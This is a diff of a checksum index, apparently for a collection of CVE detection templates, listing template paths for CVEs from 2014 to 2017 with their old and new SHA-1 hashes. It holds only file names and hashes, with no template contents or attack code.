-http/cves/2014/CVE-2014-3744.yaml:ef82571e3fd9947c935fb978114e323826edf9a6 -http/cves/2014/CVE-2014-4210.yaml:b58d6efe179c70093be240210323d92369e1028e +http/cves/2014/CVE-2014-3744.yaml:e558b2c745e05e4c0025ceac2405b1252ab07d25 +http/cves/2014/CVE-2014-4210.yaml:1da5b0613ac1f2914cd717a6668459eaed6b923f http/cves/2014/CVE-2014-4513.yaml:f773b0ae252939028612a224507f9815e8af7c49 http/cves/2014/CVE-2014-4535.yaml:5ea240904288e526982f8498a054c0f81060814b -http/cves/2014/CVE-2014-4536.yaml:13670cc31689486e90a99f52d3e4885da56764d8 -http/cves/2014/CVE-2014-4539.yaml:afefc3796ac36e4fc8a426d4812d5a385b99c013 +http/cves/2014/CVE-2014-4536.yaml:9a419e33efcbea5baa4f8d653258be1a45b5ac76 +http/cves/2014/CVE-2014-4539.yaml:26b3d086f448e6808ff2d7cc1fcee23ff25dbb31 http/cves/2014/CVE-2014-4544.yaml:9b348c6784b4e52f72f556420bdeebf266b0c266 http/cves/2014/CVE-2014-4550.yaml:d91b194e084d6abcb57601e52751f8de18ac94d4 -http/cves/2014/CVE-2014-4558.yaml:cb86477374d9732e3e105e0a4fa261d2b7b3334a -http/cves/2014/CVE-2014-4561.yaml:e9fd8e8996feb9b722721a71c7e27e362232d5b8 +http/cves/2014/CVE-2014-4558.yaml:32ad362633e7f3c89c17684fa2f0add284cce52f +http/cves/2014/CVE-2014-4561.yaml:bb07a47af2690288b49fe39a07dcbda30fb71b2d http/cves/2014/CVE-2014-4592.yaml:04d3f44b089e28ea1d584bead8b557aee3d12f63 -http/cves/2014/CVE-2014-4940.yaml:4b5a22a6747e632fca14beeda1d57d8cce28d1b5 +http/cves/2014/CVE-2014-4940.yaml:6f2d09cfc92e6e1f5624fa66305e6aef9b93c22e http/cves/2014/CVE-2014-4942.yaml:ca31e2efcd6b8e2593546a1951f70b3a0291d9b6 http/cves/2014/CVE-2014-5111.yaml:41b3e9480d86bc114cc55c99a0fbcc65563b6616 -http/cves/2014/CVE-2014-5258.yaml:1cc78037f6259e242fb49770701c0ca56ec985d9 +http/cves/2014/CVE-2014-5258.yaml:b4097cdbe58cf74d91b4a7249119cb46a186d3d9 http/cves/2014/CVE-2014-5368.yaml:a164c0d868655690541a180330c2ee48979fff2f -http/cves/2014/CVE-2014-6271.yaml:2d2c156a02cf70a6c763bfbfadf468743fd8bf3a -http/cves/2014/CVE-2014-6287.yaml:d00ad93561cbacc4ce47a3ef7ffc4b1ef7e01dde +http/cves/2014/CVE-2014-6271.yaml:91fe47f1efff2e7850a3a9c8408dcaea4b7fcfa1 +http/cves/2014/CVE-2014-6287.yaml:50e85a0a80464d40fe58430414e03d67b11fce10 http/cves/2014/CVE-2014-6308.yaml:aa88544552c7b66b74ede5bf9e0b134edbf863fa -http/cves/2014/CVE-2014-8676.yaml:61f909af6c06fd952f0be4bf979eb4fd506f4646 -http/cves/2014/CVE-2014-8682.yaml:0c494b1f9c0dafc3b160990c57e7223407190531 -http/cves/2014/CVE-2014-8799.yaml:0382dc2bc1fb61ca6f5621db125cd5e130677bcc +http/cves/2014/CVE-2014-8676.yaml:72239c99e43a574291bd68fbbd57a06dd9a48555 +http/cves/2014/CVE-2014-8682.yaml:e1307f41692edd23e6751e01190e7cf2dcc6346d +http/cves/2014/CVE-2014-8799.yaml:55e4235f8b2c2d12d78d809d1a9233f6d3049952 http/cves/2014/CVE-2014-9094.yaml:13aebc2fd2c559c5ee127d7c8ddc0dbb681c84fd http/cves/2014/CVE-2014-9119.yaml:f1cd0ce2c6014b22a0cf943c0ea4a3d58fc147e6 -http/cves/2014/CVE-2014-9180.yaml:2614bec3825e1144f2105f88b5996b4e8d2bd974 -http/cves/2014/CVE-2014-9444.yaml:350cbdc330eaeb16a0632470b3bffbf8f30843ea -http/cves/2014/CVE-2014-9606.yaml:fc9279c8cf3d861813a21ab92fee4eaba58f4348 -http/cves/2014/CVE-2014-9607.yaml:f7c91e2b1302d005ee3e0e09c969c0b03f958d5b -http/cves/2014/CVE-2014-9608.yaml:70eaed8ec9130ff24fd85d03d8ed515ba58d50ff +http/cves/2014/CVE-2014-9180.yaml:15dcee27c96bb39f779c55321c7d133b3a4a11f8 +http/cves/2014/CVE-2014-9444.yaml:8c4ab8aa355b6feda6e04a50176a12666a8e1a66 +http/cves/2014/CVE-2014-9606.yaml:74cc1154e0374f962b3962f9f1ae08cacd632aff +http/cves/2014/CVE-2014-9607.yaml:bae4ee40ea38adab99256ff8810f842a528a02a4 +http/cves/2014/CVE-2014-9608.yaml:a3dffef6553a16a35bd4080bb9c255a1c6dfbeb3 http/cves/2014/CVE-2014-9609.yaml:d421d78b1f69c9f53e2a166d11e80fc8e317204e -http/cves/2014/CVE-2014-9614.yaml:be82a01c22e89dfd05854d99f323f85fb1272fa4 +http/cves/2014/CVE-2014-9614.yaml:01bdb613d35cf22722197f354d046532e5bc41f7 http/cves/2014/CVE-2014-9615.yaml:59a97a7e4a3fc7fa230940a4601b02da8b69371b -http/cves/2014/CVE-2014-9617.yaml:f61655deba876aef1cac555b81daeba2f597f2d3 -http/cves/2014/CVE-2014-9618.yaml:23c7186355dcc8343749533efcbaab73d95de7f0 +http/cves/2014/CVE-2014-9617.yaml:acb0b5cab66249f9b07c789cca09d8c1d51488ce +http/cves/2014/CVE-2014-9618.yaml:fbf5a3a378ae96a0f1ebcd2980f3113549c3af6a http/cves/2015/CVE-2015-0554.yaml:d20883db51faac8ddf1fcf4709e557d1967c7485 -http/cves/2015/CVE-2015-1000005.yaml:fd70d70d204eaef2488cb10a35f8413b452c8148 +http/cves/2015/CVE-2015-1000005.yaml:148ee1bcb93fa4293b5027a83c6cdf252851511b http/cves/2015/CVE-2015-1000010.yaml:080f04e2df67eb050ba392f3bf8ef27a87abdd05 http/cves/2015/CVE-2015-1000012.yaml:c4d338e114a302fa98bf87eb0a3e1255419d74eb -http/cves/2015/CVE-2015-1427.yaml:2d09b43b55f0547ec76a1f0c96c0a766bf82b645 -http/cves/2015/CVE-2015-1503.yaml:ea24b2716928e4a8081b77dc1550e8d174f457bc -http/cves/2015/CVE-2015-1579.yaml:286f1a1f3f288d36e236151507dc5a1786d458ed -http/cves/2015/CVE-2015-1635.yaml:696743e064b04c6ddb7630f02ac7bfa79a58ff0b -http/cves/2015/CVE-2015-1880.yaml:d3e1699c7315a3a9caea1a899b2a61762f6e5e3b +http/cves/2015/CVE-2015-1427.yaml:2052c433e8cec1bcba0a0c0ab79cae38f82b611d +http/cves/2015/CVE-2015-1503.yaml:505b6ad4223db51a89a64d57d71ea57f610162b9 +http/cves/2015/CVE-2015-1579.yaml:79d36985380867eb86b8493525f4df9c4823b2d9 +http/cves/2015/CVE-2015-1635.yaml:7e86c46c0d912d6b56ce0ca101290f9968b7e2be +http/cves/2015/CVE-2015-1880.yaml:bb7698568401bd95647404819705e35b1e7b9c8e http/cves/2015/CVE-2015-20067.yaml:77e222d17ecb3663400b5bb143f2ab56845043b2 http/cves/2015/CVE-2015-2067.yaml:2835680c4edd735249eefa325c2ab2af801136d4 -http/cves/2015/CVE-2015-2068.yaml:3391d599f0dafcde5eba8d662394cafe1ff19ffe -http/cves/2015/CVE-2015-2080.yaml:5dc808f109695b251ab7268e0e293136043baed2 -http/cves/2015/CVE-2015-2166.yaml:71bf7c74e59db0e64e4dc5811d047f7ed9c527e4 -http/cves/2015/CVE-2015-2196.yaml:41c3025eda3b296fadb3afb70e9f44ab5e855a86 -http/cves/2015/CVE-2015-2755.yaml:153c44d93a107d184876d575101a5e3bae6ade75 +http/cves/2015/CVE-2015-2068.yaml:c953242135a61e88df9918d88a563f12a78f7a44 +http/cves/2015/CVE-2015-2080.yaml:c8c1355c24f22a98ecd07ff45b5639045ebbf4c9 +http/cves/2015/CVE-2015-2166.yaml:44a883aee08d308103ab096e203af4147fb63c11 +http/cves/2015/CVE-2015-2196.yaml:978724dc54bb9ae4f534a373d87a67d4538e6858 +http/cves/2015/CVE-2015-2755.yaml:82a0a885cb854fa843400aae700b6189febf8341 http/cves/2015/CVE-2015-2794.yaml:22fea2657bd50593544f2ea1d4e1e61f7044f541 -http/cves/2015/CVE-2015-2807.yaml:a32104390b45df0c648be1124edd91b81a398bd8 +http/cves/2015/CVE-2015-2807.yaml:a227602f43f63d8af4f98cfaf7357fc6d357224c http/cves/2015/CVE-2015-2863.yaml:94f9d4de683bd0f7ed17d5cf945e89a3af50fd0f -http/cves/2015/CVE-2015-2996.yaml:4a148288d459b04645da3f50f3d5ed9f2a569fe9 -http/cves/2015/CVE-2015-3035.yaml:7e9bcc2539eee69c097358692a1fb05cec8af353 -http/cves/2015/CVE-2015-3224.yaml:c3fa9504f5cba20a3037356578c60c6599bf4218 -http/cves/2015/CVE-2015-3337.yaml:23782a8e4f10c0ee363490768863280168caaf09 +http/cves/2015/CVE-2015-2996.yaml:4301c965d3ce4ee88948b11567c53f0c1f649fc3 +http/cves/2015/CVE-2015-3035.yaml:2ff6416b34c58d2f32282653c0b7b5ae4046814f +http/cves/2015/CVE-2015-3224.yaml:313678c50c664b17121e54cff7095002c666217f +http/cves/2015/CVE-2015-3337.yaml:b2ad45e3260bfa0a8120a1f1c0395d06faae88b4 http/cves/2015/CVE-2015-3648.yaml:33e6aa6bb2981bbe6e7798ce23c59f911ab22255 http/cves/2015/CVE-2015-3897.yaml:7e151eb750e3c1602ea9cb1aa3e9a2d68ca31770 -http/cves/2015/CVE-2015-4050.yaml:dc0beb1e5f5a7106fc13e1e7cd483c123cd3bef5 -http/cves/2015/CVE-2015-4062.yaml:f87a6cda00bb59fff638d8bd2d24c5bfef8c54fa +http/cves/2015/CVE-2015-4050.yaml:1fb6c88775ea0bb6994b2e298ee5c8b73719e3c3 +http/cves/2015/CVE-2015-4062.yaml:378f403ff95aa7bee5c65579e5d754b97e63e3e7 http/cves/2015/CVE-2015-4063.yaml:82f243448aa7204d9d610679fb10f817dbb54750 -http/cves/2015/CVE-2015-4074.yaml:065fb740afd3068b6d1e46df88070d26b6ce45e0 -http/cves/2015/CVE-2015-4127.yaml:544be4829bf72ee7d73cc4cb7f47f3fd3f1ae01c +http/cves/2015/CVE-2015-4074.yaml:b5d68e8c21d90b492949a026199011ffa9b7ccb4 +http/cves/2015/CVE-2015-4127.yaml:07a76d863355591fa4bf3161356ac8edebe9ca97 http/cves/2015/CVE-2015-4414.yaml:d62aaf0ccbf4332dd956ee3fa625dfef380e07cd -http/cves/2015/CVE-2015-4455.yaml:c9428c8c8a30af5dfb87b2b89927f3ce1ba7b554 -http/cves/2015/CVE-2015-4632.yaml:d062862654959446af1cb7bdb1e5ff2ff029510e -http/cves/2015/CVE-2015-4666.yaml:846d0baaf39e9f004c072d698ff122871460f68e -http/cves/2015/CVE-2015-4668.yaml:2b4888f257c6dc0cba9ee277c343475ea06da19f -http/cves/2015/CVE-2015-4694.yaml:80d4b715db569ba21691325fc5f2ab037f17d062 +http/cves/2015/CVE-2015-4455.yaml:891c495387a931870d0ceec861fc320c8b076967 +http/cves/2015/CVE-2015-4632.yaml:834457ecf87f6fbc2957118f24eab2f08a922f39 +http/cves/2015/CVE-2015-4666.yaml:d75fda264bca4227d5bed4d82da1aaf9a958c8ae +http/cves/2015/CVE-2015-4668.yaml:a7fd56350c28d37828eb15704a45a4b5d57bf11b +http/cves/2015/CVE-2015-4694.yaml:c66194043edff2b0b26162c69fb40f5245877588 http/cves/2015/CVE-2015-5354.yaml:628f69500fd63d21bb4637dcb719434c1f5aa353 -http/cves/2015/CVE-2015-5461.yaml:98d9a0b63a0e104cd4ea59960c8b3025f454ab93 +http/cves/2015/CVE-2015-5461.yaml:98d8eb40f34b8c6d6d603dd8078a68d86a896f90 http/cves/2015/CVE-2015-5469.yaml:993b7db9108784f0a7abb12ef8b33c5d5c1cc68e -http/cves/2015/CVE-2015-5471.yaml:9420a5c26f7a98952a37310c5bb99e1eb97180a1 -http/cves/2015/CVE-2015-5531.yaml:fd64db7797d56f409149f174b8852d1b3a6c2887 -http/cves/2015/CVE-2015-5688.yaml:694c1bca800b7a0c2fc37ee0ca2504f8390fe5fe +http/cves/2015/CVE-2015-5471.yaml:f73d747097f7021c3ea779182d4317198dfadbbd +http/cves/2015/CVE-2015-5531.yaml:f860f8459f55bfea5bf44d5317a66012a44970dc +http/cves/2015/CVE-2015-5688.yaml:dfdad41c83a97739b7002798c9614018919b5c4f http/cves/2015/CVE-2015-6477.yaml:9255a94059eced9c3b57520ad58ac346f15c8d2b http/cves/2015/CVE-2015-6544.yaml:b3e7f972c791e433d02747d3a2f15e2b93dd5128 http/cves/2015/CVE-2015-6920.yaml:010bca7f3c3d63174ad513216c778c12be764930 -http/cves/2015/CVE-2015-7245.yaml:6e9cbe30f70116bad5ad6c71c89444ee6a7997f3 -http/cves/2015/CVE-2015-7297.yaml:021c4ad5384f1d81394c1b918530645865192610 -http/cves/2015/CVE-2015-7377.yaml:d282abafff78076c75643f69f95bf7d5dc7b5078 -http/cves/2015/CVE-2015-7450.yaml:8e8c91379d5ccc4e75b971b87531f6292d794fed -http/cves/2015/CVE-2015-7780.yaml:12e89bd0bde43516f0d7847e08871137a999baf8 -http/cves/2015/CVE-2015-7823.yaml:9f4f599e8e658f3cf369f118166d82bcaba262c5 +http/cves/2015/CVE-2015-7245.yaml:d7c4caa6aebd858813b48f504170ead93f76c97e +http/cves/2015/CVE-2015-7297.yaml:479397b821556af05d4883e6dec21032e5fa5c7b +http/cves/2015/CVE-2015-7377.yaml:056f3a75cc766de47884ee47bc3475d52de4c5dc +http/cves/2015/CVE-2015-7450.yaml:6fa68acdf9f9b816bc885ea187a929c5f0e1f201 +http/cves/2015/CVE-2015-7780.yaml:158102b86a2ba04cff932be068374b3aa67377c4 +http/cves/2015/CVE-2015-7823.yaml:419b139acb8649df87f9fbdd151b5a4a23674e2f http/cves/2015/CVE-2015-8349.yaml:856790657d418e60710c440179383bf5528db0b6 http/cves/2015/CVE-2015-8399.yaml:88082e1686fa05ae008feb2f2d6a0eeba15d8696 -http/cves/2015/CVE-2015-8813.yaml:270c457316c64ff3991b0c1bf0370820a19edf5c -http/cves/2015/CVE-2015-9312.yaml:ac616d4b93d14c3c824063ec8d69cc652a03c694 -http/cves/2015/CVE-2015-9323.yaml:189fc2bcd1415c764404c143c884d8f294dadc7e +http/cves/2015/CVE-2015-8813.yaml:7c2d2a8feb91d0c4eb7f5133a631276db24e318a +http/cves/2015/CVE-2015-9312.yaml:19fbaca553a825f2ff06036d499b163f79994c04 +http/cves/2015/CVE-2015-9323.yaml:e764a97924ed55cb99181149860192850ef709e2 http/cves/2015/CVE-2015-9414.yaml:44f53443a463d463c575726eec3ff5192b2bcb27 -http/cves/2015/CVE-2015-9480.yaml:b264e3550af7189a4254409797596181dc20e536 -http/cves/2016/CVE-2016-0957.yaml:1e35a4f37a63b1317d63a143785c57d7085079ee -http/cves/2016/CVE-2016-1000126.yaml:7f0cccf2ca739d106795020c3403754d42dcf431 -http/cves/2016/CVE-2016-1000127.yaml:f734f23ae4fb3db3df4dc3b2074e3fc475798176 +http/cves/2015/CVE-2015-9480.yaml:76d467ff7bdd50d5b4b0c6eb8735888258d83aec +http/cves/2016/CVE-2016-0957.yaml:6a4aceb98204ef9b710851d91fde84365704e013 +http/cves/2016/CVE-2016-1000126.yaml:77ea357d95ad88637f6db5ead04573a8af9dcbaf +http/cves/2016/CVE-2016-1000127.yaml:5d4c49411b8f59c68c53286b173ebec38363dbbc http/cves/2016/CVE-2016-1000128.yaml:42f74b0e57adf59effe7e114152a36202d61eb6c http/cves/2016/CVE-2016-1000129.yaml:6a9354109374ffdb6807cff25eb83aaebb9e58a2 http/cves/2016/CVE-2016-1000130.yaml:1f43e1aba00fb7e7bb30af51d831b340e5ab6ba2 -http/cves/2016/CVE-2016-1000131.yaml:eea2050343c4a488fe2504a2bcaf5d8a48bd25d7 +http/cves/2016/CVE-2016-1000131.yaml:3308d2f197f8ef3f8f816b639c48c668ab67ea58 http/cves/2016/CVE-2016-1000132.yaml:cbe226168be37f3644a070a0dd06f39419676b95 -http/cves/2016/CVE-2016-1000133.yaml:d3bc987f042da3ead318724afe55fd95e5b1edf7 +http/cves/2016/CVE-2016-1000133.yaml:543a1628eed4a70ef1bda756d2a452e184632e0a http/cves/2016/CVE-2016-1000134.yaml:09dbf84e0e4ddff69119ae612f2cdf3f21c7675f http/cves/2016/CVE-2016-1000135.yaml:5984d6af6ad7e94cd4dcf61907054f9dfd449c96 http/cves/2016/CVE-2016-1000136.yaml:5ee948fb4f7e2df7f4acf3e1ffdf28e9dfaf5322 -http/cves/2016/CVE-2016-1000137.yaml:9aef7c2f783a467b51a62ed589f6ae59256d8ac1 -http/cves/2016/CVE-2016-1000138.yaml:b68163b0ee38a281652b7901553e8916d329edf4 +http/cves/2016/CVE-2016-1000137.yaml:7992a62d8b0a760dc2745ea2d4bdcff8a8c63dd7 +http/cves/2016/CVE-2016-1000138.yaml:ef4e7b323056e6d946ca47ef4c1a2e2b727d1ab0 http/cves/2016/CVE-2016-1000139.yaml:8b0948303469e93387ad15ba7c7d26ddd0864b29 http/cves/2016/CVE-2016-1000140.yaml:824295a403f50be40c0442f34403855e9a1d472b -http/cves/2016/CVE-2016-1000141.yaml:49313fa387bdf26aa28142f6269df45666b07fae -http/cves/2016/CVE-2016-1000142.yaml:45514d06a481033045795c71716c8059d292a113 +http/cves/2016/CVE-2016-1000141.yaml:7dedcea1a8ad3f4b2f71389036404f164c088465 +http/cves/2016/CVE-2016-1000142.yaml:299e7a60c352c0d7ea4f9a6d75d436f15aab1c13 http/cves/2016/CVE-2016-1000143.yaml:27bb71d021209094b538c07f4f52733dbc941fbd http/cves/2016/CVE-2016-1000146.yaml:0f4feb40b92ac6e9e336bc76a07d46ff7071f845 -http/cves/2016/CVE-2016-1000148.yaml:8bd3a44bd2de1d17a7013a8b4414592d714dd009 -http/cves/2016/CVE-2016-1000149.yaml:e52bed66eebb7a36ce9e4d561b83aab415d74b93 +http/cves/2016/CVE-2016-1000148.yaml:25ba12031468a02dba3afd1911f23c94572dc39e +http/cves/2016/CVE-2016-1000149.yaml:86bc42b8ccb0e878805966b9cbe4a0d876d7f77b http/cves/2016/CVE-2016-1000152.yaml:d94328828fbf18aba5ef94afb0bd4df113377769 http/cves/2016/CVE-2016-1000153.yaml:918980710b38127ac9e1da9cdeb7424b9ee7b74f -http/cves/2016/CVE-2016-1000154.yaml:b9b595a45da1f0abc17a0317966ccf37502f3b32 -http/cves/2016/CVE-2016-1000155.yaml:2593c713fa519135dfb57c496ed29717442b4d1e -http/cves/2016/CVE-2016-10033.yaml:07e175a97834dc66dd1b1aa53488674ec28d99ee -http/cves/2016/CVE-2016-10108.yaml:4ad5dcf1e80c55a63c1a2c20f78518c788682a3c -http/cves/2016/CVE-2016-10134.yaml:d5d72c88d30e317cbd66969833a6926430e67452 -http/cves/2016/CVE-2016-10367.yaml:03998afbe088954045fe7c95a156012c703468e1 -http/cves/2016/CVE-2016-10368.yaml:48a6f0568fc5bd0b8d2da813f1551cc0f14817c0 -http/cves/2016/CVE-2016-10924.yaml:93ae1c57b6f6e841ca49b9789fa4caa8bcdc66fa +http/cves/2016/CVE-2016-1000154.yaml:7a051fc4ae2373f86ad53f6abdda4d7096fdf62e +http/cves/2016/CVE-2016-1000155.yaml:647dfeeec99b332ef140771291662d1cbe99286a +http/cves/2016/CVE-2016-10033.yaml:232d83356ff34a267485bcb25a7dbf545fce3e88 +http/cves/2016/CVE-2016-10108.yaml:fec37410b6b632419f59b6c386bf2ad37db2282c +http/cves/2016/CVE-2016-10134.yaml:cb89300fac923d957bf6f61202f8fdc1159d643a +http/cves/2016/CVE-2016-10367.yaml:7e0f439a28a7d9e0294a6752135175a00d4df520 +http/cves/2016/CVE-2016-10368.yaml:f7e31f13e4b1e7d3e9e714d3333462629b0a0e35 +http/cves/2016/CVE-2016-10924.yaml:f0f8949f73e892e9f269db834c2b6872c15f5a07 http/cves/2016/CVE-2016-10940.yaml:180cd258d3c386e8bba06f4d17e019d36486d58f -http/cves/2016/CVE-2016-10956.yaml:6ddebb530a65c19dc55dcac04bb17195a2d199f0 +http/cves/2016/CVE-2016-10956.yaml:3c167a0e9cca4b786fda517c6bc7668cee4141db http/cves/2016/CVE-2016-10960.yaml:b712cb8e00ee7b482822de5367d1981a182200d6 -http/cves/2016/CVE-2016-10973.yaml:6ec26f4101c693c2a5c27c2a51b6bd7cd06c958c -http/cves/2016/CVE-2016-10993.yaml:c3bd4f71c842bba3db2514df40096f1ee68a1704 -http/cves/2016/CVE-2016-1555.yaml:1d2bfa16bc81a12d2dcdb87791b49885c1173536 -http/cves/2016/CVE-2016-2389.yaml:04ae773cadb3cb1c5983e5adc34230df1dc8c648 -http/cves/2016/CVE-2016-3081.yaml:c320036374c13e57e99267fb6018d56e8acb8fbb -http/cves/2016/CVE-2016-3088.yaml:e94dfbbb1ff9cf8b1618b04d4101c0af4d09673e -http/cves/2016/CVE-2016-3978.yaml:d720d40651f85c198e21942edbed743c64a9f8f0 +http/cves/2016/CVE-2016-10973.yaml:436451c68c9ddcd9b94a26278477ae2c41a1d880 +http/cves/2016/CVE-2016-10993.yaml:9bdd195c57b0946d4ed5c3df87dfd5837de8a22c +http/cves/2016/CVE-2016-1555.yaml:6b3e893a1320115b0e18d785105a0f7d5775d683 +http/cves/2016/CVE-2016-2389.yaml:928ce62f5f7913e63131cdb7484fc7b35ab40f9e +http/cves/2016/CVE-2016-3081.yaml:1085462cce049c99ca76f547b4599989a14efc98 +http/cves/2016/CVE-2016-3088.yaml:f91d8ac41e4432028cfbede6964661454e2331ff +http/cves/2016/CVE-2016-3978.yaml:b59e9ed3e4c91df88b86bb456095ec9ed543d290 http/cves/2016/CVE-2016-4437.yaml:4d774c5cc985a117d6a2214f892423f5c636d32e -http/cves/2016/CVE-2016-4975.yaml:3c579d1811852cd5ec879c48517456e16db5bee3 +http/cves/2016/CVE-2016-4975.yaml:98681241e1d9f4db62b42820bba949ed2f152e2b http/cves/2016/CVE-2016-4977.yaml:ee48ddeac3b6d5461bc8980481e880af947436db http/cves/2016/CVE-2016-5649.yaml:beebd1faee4723faa26e1f0fe5a73e59628c2cfa -http/cves/2016/CVE-2016-5674.yaml:d66c224b8e31aac1148c8a8222fd05d0bf83f4f5 -http/cves/2016/CVE-2016-6195.yaml:cc759bb391932b601d77a77782a08789c3b0e29e +http/cves/2016/CVE-2016-5674.yaml:05184cce04ffa241bc304b0f242daaec7107280a +http/cves/2016/CVE-2016-6195.yaml:108d4b0cb54ea491a3c8e177bc56a13f8162dfbb http/cves/2016/CVE-2016-6277.yaml:c93b89da0c42f6e280440504cb3dd67c981a8d17 http/cves/2016/CVE-2016-6601.yaml:afa3f46e2bae4d3e90c1f403147d3e8a5b7d5739 -http/cves/2016/CVE-2016-7552.yaml:4f0c37827b9def8ef834d15f76bc2eba2f73c20a +http/cves/2016/CVE-2016-7552.yaml:b8c439538226b5eca13f4e80bf74f0ac0cd45749 http/cves/2016/CVE-2016-7834.yaml:11e35334c12e72dab14682a71d851436eb898e8e -http/cves/2016/CVE-2016-7981.yaml:eff26ab72ed98f672b3893bbc6f087847dd3c6ec -http/cves/2016/CVE-2016-8527.yaml:3c885a2ec3ec1f060a62e99dbaf16bd93ff32ae6 -http/cves/2017/CVE-2017-0929.yaml:d991797935a9f79ff7d504f4eabb9781d66a9937 -http/cves/2017/CVE-2017-1000028.yaml:4a38a181854f0963809b9a92cbf860a76d5934e0 -http/cves/2017/CVE-2017-1000029.yaml:7ba91d7c08f4e2feb3bd20daa0195baca63b141e +http/cves/2016/CVE-2016-7981.yaml:948a6727c2a8d4385c276e5d1e567cf6938371cd +http/cves/2016/CVE-2016-8527.yaml:de4d4d55ae233f9d0cc2cccf2527eaa43f2404fe +http/cves/2017/CVE-2017-0929.yaml:689211627cec05f38e3139c3f39271bd9542eb43 +http/cves/2017/CVE-2017-1000028.yaml:80cbf906dcacf0ba374dcacaec27b5e8b36e01df +http/cves/2017/CVE-2017-1000029.yaml:876ec94e59e9130cb5d34ff5c4a1e620251c37b0 http/cves/2017/CVE-2017-1000163.yaml:0c603eb787ab15dd4f944ea5b87b78f4af11afb8 http/cves/2017/CVE-2017-1000170.yaml:7ba7587d2b35dc762634a2c9490ca0bdea3fda51 http/cves/2017/CVE-2017-1000486.yaml:5345b553ebe658749c5016c21fc17f4e7fdc12aa -http/cves/2017/CVE-2017-10075.yaml:641ab314a6e2f53762cdf2a0f3897c1cfb77974e -http/cves/2017/CVE-2017-10271.yaml:9d413c1811cf3686bcd4e9d2e3f1dfc0473aa72a +http/cves/2017/CVE-2017-10075.yaml:4bfbacc8e70549ff7a5b7f9e8ab3cca9f0f0948d +http/cves/2017/CVE-2017-10271.yaml:9b29a0d9242daab5c40fe8271718a8de9207e06e http/cves/2017/CVE-2017-10974.yaml:b0ae2bfd11149aecfa26d8faa954a8f8292f171c -http/cves/2017/CVE-2017-11165.yaml:033bfb79031486baf87201b5bfdd78e9d5708ddf -http/cves/2017/CVE-2017-11444.yaml:9e1e2a2b3a2e7551bf784ee43d7ab6eddf17586b -http/cves/2017/CVE-2017-11512.yaml:c9aeca8c1b8393dbd10f801c430d9bccf1c56024 +http/cves/2017/CVE-2017-11165.yaml:335f7c179dccc3c2ea100da30d83ef0a2fca00d6 +http/cves/2017/CVE-2017-11444.yaml:a388e3b68002ab31cb33b61d088534f8d1b273a4 +http/cves/2017/CVE-2017-11512.yaml:551d25f72869af07044971e06d7c9aef09a9eeae http/cves/2017/CVE-2017-11586.yaml:cb58394e00a6e06966ba607d6a4ebca3ac268972 -http/cves/2017/CVE-2017-11610.yaml:eb78eddbb2fcab5fa16129517a797b6bdb5732f5 +http/cves/2017/CVE-2017-11610.yaml:ad211be750982c1ef4165048da870fb2e789c67b http/cves/2017/CVE-2017-11629.yaml:fc84633073745770603d19a552733beea2ac9779 -http/cves/2017/CVE-2017-12138.yaml:489f8ed13f4cb45474c7dd415f949f58d2e527d9 -http/cves/2017/CVE-2017-12149.yaml:7592bc1509f9f9fe1a95fd892fb1fde0741cbeca +http/cves/2017/CVE-2017-12138.yaml:676cfe5f8f65f4ed3f4cf5846ba3b05c28e13e41 +http/cves/2017/CVE-2017-12149.yaml:5cfca7ee5636a93632aeb615f1d427aee75013cd http/cves/2017/CVE-2017-12542.yaml:0f4e30ef500ff64da2e8c5eca028a1dd35a44f6c -http/cves/2017/CVE-2017-12544.yaml:f1c29b43556fb369e47d4cb76075f2a29f1ce42f -http/cves/2017/CVE-2017-12583.yaml:b2c905c923b983ffc7bf1594af70ddfb6364d82d -http/cves/2017/CVE-2017-12611.yaml:92b9fa46b705313c0802c2b2052522c252e38c4a -http/cves/2017/CVE-2017-12615.yaml:658591eca02d16896bf1de63e11184e8c94eb114 -http/cves/2017/CVE-2017-12617.yaml:97b693df4d281505706c2bfc655204d3b6c6bd31 -http/cves/2017/CVE-2017-12629.yaml:b15218a1d9735f83829b8c3f5d88844372a8dc67 -http/cves/2017/CVE-2017-12635.yaml:9a87836fee73257459dd22c52df8cf282511aa3c -http/cves/2017/CVE-2017-12637.yaml:b62ba5d049e7de09b22fc435fd1d8bb93a49aebe -http/cves/2017/CVE-2017-12794.yaml:931ca495a59e90e43e2088f8bd2b98b757df6b8a -http/cves/2017/CVE-2017-14135.yaml:f9a00d39f3645085974c85bb85f110ee83b91db2 -http/cves/2017/CVE-2017-14186.yaml:3ff44039ab5995e4d70e3f03f63714a50d975df1 -http/cves/2017/CVE-2017-14524.yaml:89909bde93c70dbc1eecba358bd6b0e9f721ab0a -http/cves/2017/CVE-2017-14535.yaml:393824e4fae232b8c9c613fb1995297f810d80aa +http/cves/2017/CVE-2017-12544.yaml:c4eae0c6efa6c3fc9ded84cc1e4624951ba966f9 +http/cves/2017/CVE-2017-12583.yaml:4b305b31b1330fdb1c24ec5787f57c060a42c11c +http/cves/2017/CVE-2017-12611.yaml:72658b1e16883bf8fe5ab1b8a0357e7c1518df56 +http/cves/2017/CVE-2017-12615.yaml:c912d36a03fb120bd0925b58561dbae629d345b5 +http/cves/2017/CVE-2017-12617.yaml:d92e32ab1c635908b9f63c99eedbc85476df017b +http/cves/2017/CVE-2017-12629.yaml:1b9b31ff6170297ba3b4f6fce3f0fd545c3f0a5d +http/cves/2017/CVE-2017-12635.yaml:db4eebc97e2ae1fa1558cdde2bf1123b319959c1 +http/cves/2017/CVE-2017-12637.yaml:f6a1b763290d992add7cf068d6051031c21f47b1 +http/cves/2017/CVE-2017-12794.yaml:4fe35ab1aaf9361761a37580d0c94f1bb8962c29 +http/cves/2017/CVE-2017-14135.yaml:fd02174fcd39ebd97a8ac4f34b6318d407d31e96 +http/cves/2017/CVE-2017-14186.yaml:e696378be2d403a776827e81a021a037942ef508 +http/cves/2017/CVE-2017-14524.yaml:eb53f561b7702df075913dd2c473245064faf3c0 +http/cves/2017/CVE-2017-14535.yaml:d6d786c498806e7d3fece3f2b9f853bdab962254 http/cves/2017/CVE-2017-14537.yaml:b63bf53960d40b3f5711d611754cb9a86ee8c053 -http/cves/2017/CVE-2017-14622.yaml:f451a8f5a39697e2ffacd9bab2fc9cf2c35b4d9b -http/cves/2017/CVE-2017-14651.yaml:eef399098a0804d41f1c9bc23b0d1aea27bad63f -http/cves/2017/CVE-2017-14849.yaml:8f9a241ef3b3cd17cb1e73e604d999a092279173 +http/cves/2017/CVE-2017-14622.yaml:eb5b0b5643d963dc7d8d48e3eb928ba7c46c31a4 +http/cves/2017/CVE-2017-14651.yaml:3bbb9436f3323be25dcb01b3b5157828bfcacfdc +http/cves/2017/CVE-2017-14849.yaml:b0590b97b7773681e21e4286050705c3003a1305 